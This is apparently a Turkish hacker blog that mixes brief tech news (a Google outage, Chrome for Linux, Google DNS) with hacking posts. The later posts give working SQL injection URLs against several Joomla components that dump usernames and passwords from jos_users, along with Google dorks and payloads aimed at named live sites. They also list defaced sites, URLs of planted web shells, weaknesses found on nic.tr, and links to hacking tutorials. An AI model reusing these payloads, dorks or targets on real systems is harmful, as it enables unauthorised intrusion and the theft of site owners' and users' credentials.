19 Aralık Cumartesi saat 22 sularında yaşanan bir sorun, kullanıcıların Google'a erişimini engelliyor.

An itibariyle Google'dan bu sorun ile ilgili bir açıklama yapılmış değil. Sorunun sadece Firefox ve Chrome kullanıcıları tarafından yaşanıyor olması muhtemel, yaptığımız denemelerde Internet Explorer üzerinden erişilebildiğini gördük. Bu da DNS açıklamasıyla çelişiyor.

Bu soruna DNS'lerin yol açmış olabileceği, hatta sorunun Google'ın kendi Public DNS hizmetinden kaynaklandığı,TTNET'e hacker saldırısı düzenlendiği de şu anda

internet üzerinde ve CHIP Online forumlarında konuşulan ihtimaller arasında.

Şimdilik bu sorunun gerçekten bazı kullanıcılar tarafından yaşandığını kanıtlayan bir ekran görüntüsünü, hem de Google Chrome tarayıcıdan bir görüntüyü koyuyoruz. Olayla ilgili detaylar netleştikçe yeni gelişmelerle haberimizi güncelleyeceğiz.

kaynak : http://www.chip.com.tr/konu/google-a-erisim-sorunu_17140.html

Linux için Google Chrome!

Google Chrome beta sürümü linux kullanıcıları için kullanıma hazır.
8 Aralık 2009 tarihinde linux sürümü için duyuru yapan chrome için ilginç bilgiler.
60.000 kod satırı yazıldı
23 geliştirici sürümü oluşturuldu
2713 hata giderildi
Linux kod tabanı için Google Chrome ekibine kod değişikliği yapma konusunda dışarıdan 12 kişi yardımcı oldu ve 48 kişi dışarıdan kod yazım sürecine katkıda bulundu.
Google Chrome Linux Sürümünü aşağıdaki bağlantıdan edinebilirsiniz.
http://www.google.com/chrome/intl/tr/w00t.html
Linux için 32 bit ve 64 bit rpm ve deb paketleriyle indirilebilir hali chrome’ un resmi sitesinde mevcuttur.

Google DNS

 

Google DNS olaylarınada el attı. Zaten el atmadığı bir oraları kalmıştı. Neyse lafı fazla uzatmaya gerek yok. İşte yeni DNS’ler.
8.8.8.8
8.8.4.4

En çok virüs bulaşan 2. ülke Türkiye

Microsoft tarafından yapılan güvenlik araştırması raporunun 7.si yayınlandı. Paylaşım olan dosyalar ve taşınabilir bellekler üzerinden bulaşan zararlı yazılımların ciddi kayıplara neden olduğu belirlenmiş raporda. Türkiye ise bu raporda 2. sırada. Onun haricinde Türkiye’nin diğer ülkelerden farkı en etkili 10 tehditten neredeyse tamamının kimlik bilgilerini çalmak ve hırsızlığa yönelik olan kötü amaçlı yazılımların olması. Bunun yanında bazı virüslerinde Türkiye haricinde başka hiçbir ülkede olmaması. Türkiye’deki güvenlik durumunun ne kadar ciddi olduğu orada sanırım.

Joomla com_ignitegallery SQL İNJECTİON

bu acıgı hiçbir yerde görmedim bizzat kendim buldum ama bgh7 sordum bu eklentide acık bulundumu diye evt bulundu dedi..::(:( yinede yayımlayım istedim ben...

google dork : inurl:com_ignitegallery

http://localhost/index.php?option=com_ignitegallery&task=view&gallery=-3 UNION SELECT 1,2,group_concat(username,0x3D,activation),4,5,6,7,8,9,10 from jos_users

http://www.policeexplorer.org/index.php?option=com_ignitegallery&task=view&gallery=-3 UNION SELECT 1,2,group_concat(username,0x3D,activation),4,5,6,7,8,9,10 from jos_users

federalhack.net hacked

 Admalar öle dandik bir hostta hasaliye gider yapıyorlarmışş ne güldük ya... olm o hostcu yüzünden 2 defa hacklendi bizim eski site..adam daha symlink degerini düşürmesini bilmiyor hala ordan host alıyorsunuz..

site : http://federalhack.net/
zone: http://zone-h.org/mirror/id/10029550

7 Security Sitesi Hacked.

 http://zone-h.org/mirror/id/10029333
http://zone-h.org/mirror/id/10029330
http://zone-h.org/mirror/id/10029329
http://zone-h.org/mirror/id/10029328
http://zone-h.org/mirror/id/10029326
http://zone-h.org/mirror/id/10029325
http://zone-h.org/mirror/id/10029324

http://williamsavino.org/
http://tomsriverfirecompany1.org/
http://scooter4life.com/
http://pba326.org/
http://policeathleticleague.org/
http://www.policeexplorer.org/
http://criticalconceptsweb.com/

cyberegitim.com Hacked

 index atmadan geçip gidecektim ama adamlar cyberegitim diyor mail plex ftp db ne kadar şifre varsa uluorta a.q yok böyle birşey deyip..gözlerini açmaları için bir index attım umarım bana fazla kızmazlar :):):)
site :   http://www.cyberegitim.com/
zone : http://zone-h.org/mirror/id/10028386
zone : http://sanalturkler.org/defacements/?id=18968

2 tane shell sokulmuş site

http://sethedward.com/wp-content/plugins/akismet/akismet.php
http://www.unikoslo.no/templates/unik/index.php

Shellden SQL Baglanıp Siteleri Hackleme admin password sıfırlama

bu videoda shellden SQL ile db baglanmayı ve siteleri hacklemeyi admin password sıfırlamayı wordpress sitelere admin panelden shell sokmayı gösterdim iyi seyirler.

http://www.dosyaload.net/index.php/files/get/-Fkk5XjRws/wordpess.rar

http://rapidshare.com/files/322350333/wordpess.rar.html

SQL İNJECTİON, Fatal Error bypass

S.a arkadaşlar bu videomda blind sql fatal error v.b hataları bypass etmeyi gösterdim..işinize yarıcagını düşünüyorum iyi seyirler..

http://rapidshare.com/files/321554227/SQL_ae_NJECTae_ON_FATAL-ERROR-BYPASS.rar.html

http://www.dosyaload.net/index.php/files/get/AXizsfPI5K/sql-njecton-fatal-error-bypass.rar

Hadi Eywallah.

Joomla / Mambo com_habertakip SQL İNJECTİON

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:com_habertakip

http:/localhost/index.php?option=com_habertakip&task=newsView&newsId=inj code..


http:/localhost/index.php?option=com_habertakip&task=newsView&newsId=1879666+and+1=2+ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,group_concat(username,0x3D,password) from jos_users


http://www.habertakip.com/index.php?option=com_habertakip&task=newsView&newsId=1879666+and+1=2+ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,group_concat(username,0x3D,password) from jos_users

Nic.tr bugs

https://www.nic.tr:8080/www/delivery/ai.php?filename=kayitoperatorlerimiz.gif&contenttype=gif  gif yazısını degiştir dosya indiriyor..

https://www.nic.tr:8080/www/delivery/  cıplak gözle dosyalar görünüyor..

https://www.nic.tr:8080/www/delivery/ck.php?oaparams=2__bannerid=37__zoneid=1__cb=00f381142d__oadest=https%3A%2F%2Fwww.nic.tr%2Findex.php%3FUSRACTN%3DSTATICHTML%26PAGE%3Dabout_registrars
https://www.nic.tr:8080/www/delivery/ck.php?oaparams=2__bannerid=37__zoneid=1__cb=00f381142d__oadest= Url yonlendiriyor herhangi bir site adresi yazın yonlensin..
 
https://www.nic.tr:8080/www/admin/index.php  admin panel ne innesi anlamadım.. :):)

https://www.nic.tr:8080/www/delivery/dxmlrpc.php burdan server dosya kurulum  dizinini bulabilirsiniz.

/var/www/ads/www/delivery/dxmlrpc.php

Joomla / Mambo com_ownbiblio SQL İNJECTİON

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com
Google dork : inurl:com_ownbiblio

http:/localhost/index.php?option=com_ownbiblio&view=catalogue&year=All&catid=-19 UNION SELECT 1,2,group_concat(username,0x3D,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users--






http:/localhost/index.php?option=com_ownbiblio&view=catalogue&catid=-19 union all select 1,2,concat(0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25),4,5,6,7,8,9,10,11,12,13,14,15,16  from jos_users--


http://52north.org/index.php?option=com_ownbiblio&view=catalogue&year=All&catid=-19 UNION SELECT 1,2,group_concat(username,0x3D,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users--